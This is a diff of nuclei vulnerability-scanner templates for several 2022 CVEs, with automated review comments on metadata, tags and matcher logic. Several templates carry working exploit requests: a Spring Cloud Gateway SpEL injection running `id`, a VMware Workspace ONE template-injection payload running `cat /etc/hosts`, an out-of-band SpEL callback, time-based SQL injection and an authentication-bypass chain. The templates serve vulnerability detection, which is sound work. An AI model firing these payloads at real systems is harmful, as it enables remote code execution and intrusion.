https://gitlab.com/gitlab-org/gitlab/-/issues/366088 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-2185 - cwe-id: CWE-732 + cwe-id: CWE-78 + epss-score: 0.5071 + epss-percentile: 0.97469 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: + max-request: 1 + vendor: gitlab + product: gitlab shodan-query: http.title:"GitLab" tags: cve,cve2022,gitlab -requests: +http: - method: GET path: - "{{BaseURL}}/users/sign_in" 
@@ -69,3 +81,4 @@ requests: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' +# digest: 4b0a00483046022100b4127186492776d7641a3e74b310dc16db32c61bcc8aaf0f5eed928c30579768022100a3666fdd83770c9f2bdb11e06228e33df10080c5bea500dad29a7d9ff311b7e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2187.yaml b/nuclei-templates/CVE-2022/CVE-2022-2187.yaml new file mode 100644 index 0000000000..26f13b2649 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2187.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-2187 +info: + name: Contact Form 7 Captcha < 0.1.2 - Reflected Cross-Site Scripting + author: For3stCo1d + severity: medium + description: | + The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers + reference: + - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d + - https://wordpress.org/plugins/contact-form-7-simple-recaptcha + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-2187 + cwe-id: CWE-79 + tags: cve,cve2022,wordpress,xss,wp-plugin,wp +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&">' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Contact Form 7" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2219.yaml b/nuclei-templates/CVE-2022/CVE-2022-2219.yaml index 4a53fdd172..e8d92c1859 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2219.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2219.yaml 
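Review bot: The rewritten description now ends with `without entering necessary credentials`, which contradicts the same sentence's `An authenticated user authorized to import projects` and the `PR:L` in the CVSS vector a few lines below. Drop that clause: `An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system.` The `cwe-id` change from CWE-732 to CWE-78 is not explained by the commit; if it mirrors the NVD record the added NVD reference covers it, otherwise it needs a justification.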
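Review bot: This new CVE-2022-2187 template uses the legacy `requests:` key and has no `impact`, `remediation`, `epss`, `cpe`, `metadata` or digest line, while the neighbouring hunks in this same commit (CVE-2022-2185 above, CVE-2022-2219 below) are being migrated to `http:` with exactly those fields; it should be added in the same shape rather than in the old one. Separately, the first entry of the body word matcher reads as an empty string, `- ""`, which matches any body and leaves the `condition: and` resting on `Contact Form 7` alone — if markup was lost in this rendering the file should be checked, otherwise the entry should hold the expected reflected marker or be removed.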
@@ -6,17 +6,20 @@ info: severity: high description: | The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website. remediation: Fixed in version 2.7.27 reference: - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a - https://nvd.nist.gov/vuln/detail/CVE-2022-2219 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2022-2219 cwe-id: CWE-79 - epss-score: 0.00179 - epss-percentile: 0.55082 + epss-score: 0.00159 + epss-percentile: 0.51461 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +27,7 @@ info: vendor: brizy product: unyson framework: wordpress - tags: authenticated,cve,cve2022,wordpress,wp,xss,unyson,wp-plugin,wpscan + tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "script%3Ealert%28document.domain%29%3C%2Fscript%3")' - 'contains(body_2, "Unyson")' condition: and -# digest: 4a0a004730450220188729b0aa88b8b60d4db5c0513b4b3f71bd46e028daaa0fa46010724787101a022100fdd646f727168394fb427e44b5dfd40098c0307b93e15c4c38826789c5aa275c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfcefb399374a0e1dd65cd66bf15ae4aca3a1a21386b55b3834dbf0526915376022067dfec245e79a0071cf91a2c9932e98f3027dac527f5492b772e911ecb8c28d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22242.yaml b/nuclei-templates/CVE-2022/CVE-2022-22242.yaml index c88e8381b9..0cf4e3db0a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22242.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22242.yaml 
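Review bot: The added reference `https://github.com/ARPSyndicate/cvemon` is a generic CVE-aggregation repository, not an advisory or analysis of CVE-2022-2219; it gives a reader nothing to verify and such links tend to go stale. The same applies to `ARPSyndicate/kenzer-templates` added in CVE-2022-22242.yaml and to `ARPSyndicate/cvemon` and `karimhabush/cyberowl` added in CVE-2022-22897.yaml. Keep the wpscan/vendor/NVD entries and drop the aggregator lines, or, if the repository policy is to keep them, list them after the primary sources.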
@@ -6,22 +6,33 @@ info: severity: medium description: | Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability. 
reference: - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US - https://kb.juniper.net/JSA69899 - https://nvd.nist.gov/vuln/detail/CVE-2022-22242 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-22242 cwe-id: CWE-79 + epss-score: 0.41023 + epss-percentile: 0.972 + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: juniper + product: junos shodan-query: title:"Juniper Web Device Manager" - verified: "true" - tags: cve,cve2022,xss,juniper,junos + tags: cve2022,cve,xss,juniper,junos -requests: +http: - method: GET path: - '{{BaseURL}}/error.php?SERVER_NAME=' @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4b0a00483046022100dd079776ea27c19753a8ad4a76e5c18c893747a661ca9102e5624558800ef324022100a443205263e77c92329409a8c948bd4c67eeffeb1aca399e376c871088778361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22733.yaml b/nuclei-templates/CVE-2022/CVE-2022-22733.yaml index 6f24d33af7..f1619bc1af 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22733.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22733.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-22733 - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6 - http://www.openwall.com/lists/oss-security/2022/01/20/2 + - https://github.com/Zeyad-Azima/CVE-2022-22733 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.20338 - epss-percentile: 0.95849 + epss-score: 0.12656 + epss-percentile: 0.95328 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 - tags: cve,cve2023,exposure,sharingsphere,apache + tags: cve2022,cve,exposure,sharingsphere,apache http: - raw: @@ -60,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f5a32e9515e111d2ed8f73755563f3ffce1aed405dc6819c0de0f74a61cd3c5802201d8a705dbac5a90bb3535da85fd744df5825dd797e901b8d46980f912af8dc04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6af293cbdd4986d1af6b7b77c096113f537236e7ea53a74d1723cc59ef0491f02204739dd5828b2f03b95cb3d91c20c90771e760b69a978c0572704cdc1feb82038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
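Review bot: The rewritten tags line keeps the misspelt tag `sharingsphere` even though the product two lines above is `shardingsphere_elasticjob-ui`; since the line is changed anyway (the `cve2023` → `cve2022` fix is correct), fix the spelling at the same time: `tags: cve2022,cve,exposure,shardingsphere,apache`. Anyone filtering on the product tag will otherwise never select this template.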
diff --git a/nuclei-templates/CVE-2022/CVE-2022-22897.yaml b/nuclei-templates/CVE-2022/CVE-2022-22897.yaml
index 74d5221bbe..4cbf8a2d1f 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-22897.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-22897.yaml
@@ -3,33 +3,44 @@ id: CVE-2022-22897 info: name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection author: mastercho - severity: Critical + severity: critical description: | - The AP PAGEBUILDER Prestashop module <= 2.4.4 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database. + A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + remediation: | + Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22897 + - https://nvd.nist.gov/vuln/detail/CVE-2022-22897 - https://packetstormsecurity.com/files/cve/CVE-2022-22897 - - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ + - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html + - https://github.com/ARPSyndicate/cvemon + - https://github.com/karimhabush/cyberowl classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22897 cwe-id: CWE-89 - tags: cve,cve2022,prestashop,prestashop-module,sqli + epss-score: 0.04685 + epss-percentile: 0.91818 + cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 + verified: true + max-request: 2 + vendor: apollotheme + product: ap_pagebuilder + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: - - raw: - | - @timeout: 12s POST 
/modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} + Referer: {{RootURL}} X-Requested-With: XMLHttpRequest - Connection: Keep-alive leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - | @@ -39,17 +50,15 @@ http: extractors: - type: regex name: version - part: body_1 + part: body_2 internal: true group: 1 regex: - "\\s*\\s*<\\/version>" - - stop-at-first-match: true - matchers-condition: or matchers: - type: dsl dsl: - 'duration_1>=6' - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")' - condition: or \ No newline at end of file + condition: and +# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22947.yaml b/nuclei-templates/CVE-2022/CVE-2022-22947.yaml index c02886515d..4b898717eb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22947.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22947.yaml 
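Review bot: The added impact text contains a run-together word, `unauthorized accessand data leakage`; it should read `unauthorized access and data leakage`. Separately, switching the DSL matcher from `condition: or` to `condition: and` (together with dropping `matchers-condition: or` and `stop-at-first-match`) means a finding now requires both the `duration_1>=6` delay and a successful version extraction from `body_2`; when the version regex does not match, `compare_versions(version, "<= 2.4.4")` presumably fails and a host that did exhibit the delay is reported clean. If the intent is to cut false positives that is a fair trade, but it should be recorded above the matcher, e.g. `# both signals required: time-based response AND extracted version <= 2.4.4`, and the extractor's move from `body_1` to `body_2` checked against the request order (the second request is cut off in this hunk).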
@@ -1,82 +1,67 @@ id: CVE-2022-22947 info: - name: Spring Cloud Gateway Code Injection - author: pdteam + name: CVE-2022-22947 + author: 0x240x23elu severity: critical - description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host." + description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - - https://github.com/wdahlenburg/spring-gateway-demo - - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - - https://tanzu.vmware.com/security/cve-2022-22947 - tags: cve,cve2022,apache,spring,vmware,actuator,oast - classification: - cve-id: CVE-2022-22947 + - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 + tags: cve,cve2022,rce,spring requests: - raw: - | - POST /actuator/gateway/routes/{{randstr}} HTTP/1.1 + POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 + Connection: close Content-Type: application/json + Content-Length: 329 { - "predicates": [ - { - "name": "Path", - "args": { - "_genkey_0": "/{{randstr}}/**" - } + "id": "hacktest", + "filters": [{ + "name": "AddResponseHeader", + "args": { + "name": "Result", + "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } - ], - "filters": [ - { - "name": "RewritePath", - "args": { - "_genkey_0": 
"#{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")}", - "_genkey_1": "/${path}" - } - } - ], - "uri": "{{RootURL}}", - "order": 0 + }], + "uri": "http://example.com" } - - | + - | POST /actuator/gateway/refresh HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - - { - "predicate": "Paths: [/{{randstr}}], match trailing slash: true", - "route_id": "{{randstr}}", - "filters": [ - "[[RewritePath #{T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")} = /${path}], order = 1]" - ], - "uri": "{{RootURL}}", - "order": 0 - } + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 - | - DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1 + GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 matchers-condition: and matchers: - - type: status - status: - - 201 - - type: word - part: header + part: body words: - - "/routes/{{randstr}}" - - - type: word - part: interactsh_protocol - words: - - "dns" - -# Enhanced by mp on 2022/03/08 + - "udi=0" + - "(root)" + - "groups" + - "hacktest" \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml index 65bc52e109..02d131fa6e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml 
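Review bot: The replacement template is a regression in hygiene and reliability: the route created under `/actuator/gateway/routes/hacktest` is never removed — the original's `DELETE /actuator/gateway/routes/{{randstr}}` request is dropped — so every scan leaves a persistent route carrying a code-executing filter on the target's gateway, and the fixed id `hacktest` collides between runs. The body matcher is also weak: `udi=0` looks like a typo for `uid=0`, and with the word matcher's default `or` condition the word `hacktest`, which is echoed back from the route definition in the final `GET` whether or not the expression ran, is enough to report a hit. Restore the `DELETE` cleanup step and a random route id, require the command-output words with `condition: and` (or a regex), and bring back the dropped `classification` block, the NVD/vendor `reference` entries and a descriptive `name` instead of `CVE-2022-22947`. The hard-coded `Content-Length: 329` is a further fragile point; unless I am mistaken nuclei computes the length itself, so the header is better removed.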
@@ -1,32 +1,48 @@ id: CVE-2022-22954 info: - name: VMware Workspace ONE Access - Freemarker SSTI + name: VMware Workspace ONE Access - Server-Side Template Injection author: sherlocksecurity severity: critical - description: An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw. + description: | + VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. 
reference: - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 + - https://www.vmware.com/security/advisories/VMSA-2022-0011.html + - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22954 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22954 - cwe-id: CWE-22 + cwe-id: CWE-94 + epss-score: 0.97348 + epss-percentile: 0.99878 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: vmware + product: identity_manager shodan-query: http.favicon.hash:-1250474341 - tags: cve,cve2022,vmware,ssti,workspaceone + tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti -requests: +http: - method: GET path: - - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d" # Executes cat /etc/hosts + - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d" matchers-condition: and matchers: - type: word + part: body words: - "Authorization context is not valid" - type: status status: - - 400 \ No newline at end of file + - 400 +# digest: 4a0a00473045022100d526962a39ddb96c782fb1b73127f860969e804b9df4fb0e992d34f58b0f8a970220594f3e21afff5d99b6ea0023e8d7fd5b96f238f8b48d7c5de5b4269733b91906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
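Review bot: The request path still carries a template expression that runs `cat /etc/hosts` on the target, but the new side drops the trailing comment `# Executes cat /etc/hosts` that made this visible to anyone reading the template, and neither `tags` nor `metadata` mark the check as intrusive. Put the comment back on the `path` entry and consider adding `intrusive` to `tags` so the template can be excluded by policy. The matchers only require the string `Authorization context is not valid` and status 400; if a patched build returns the same error for a malformed `deviceUdid` this is a false positive, and if it does not, a one-line comment explaining why the error text is a sufficient indicator would save the next reader the same question.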
diff --git a/nuclei-templates/CVE-2022/CVE-2022-22963.yaml b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml
new file mode 100644
index 0000000000..39a36176e1
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml
@@ -0,0 +1,56 @@ +id: CVE-2022-22963 + +info: + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser + severity: critical + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94,CWE-917 + epss-score: 0.97537 + epss-percentile: 0.99993 + cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vmware + product: spring_cloud_function + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + +http: + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - 
type: status + status: + - 500 +# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml deleted file mode 100644 index dc44fa1296..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml +++ /dev/null 
@@ -1,106 +0,0 @@ -id: CVE-2022-22972 - -info: - name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass - author: For3stCo1d,princechaddha - severity: critical - description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. - reference: - - https://github.com/horizon3ai/CVE-2022-22972 - - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22972 - cwe-id: CWE-287 - metadata: - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve,cve2022,vmware,auth-bypass,oast - -requests: - - raw: - - | - GET /vcac/ HTTP/1.1 - Host: {{Hostname}} - - - | - GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 - Host: {{Hostname}} - - - | - POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 - Host: {{interactsh-url}} - Content-type: application/x-www-form-urlencoded - - protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - - host-redirects: true - max-redirects: 3 - cookie-reuse: true - extractors: - - type: regex - part: body - name: protected_state - group: 1 - regex: - - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' - internal: true - - - type: regex - part: body - name: horizonRelayState - group: 1 - regex: - - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' - internal: true - - - 
type: regex - part: body - name: userstore - group: 1 - regex: - - 'id="userstore" value="([a-z.]+)" \/>' - internal: true - - - type: regex - part: body - name: userstoreDisplay - group: 1 - regex: - - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' - internal: true - - - type: regex - part: body - name: stickyConnectorId - group: 1 - regex: - - 'name="stickyConnectorId" value="(.*)"/>' - internal: true - - - type: kval - part: header - name: HZN-Cookie - kval: - - 'HZN' - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "HZN=" - - - type: status - status: - - 302 - - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23102.yaml b/nuclei-templates/CVE-2022/CVE-2022-23102.yaml index 066a97a54e..2ca0d8a91c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-23102.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-23102.yaml 
@@ -1,33 +1,62 @@ id: CVE-2022-23102 + info: name: SINEMA Remote Connect Server < V2.0 - Open Redirect - author: ctflearner + author: ctflearner,ritikchaddha severity: medium description: | - A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. + remediation: | + Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability. 
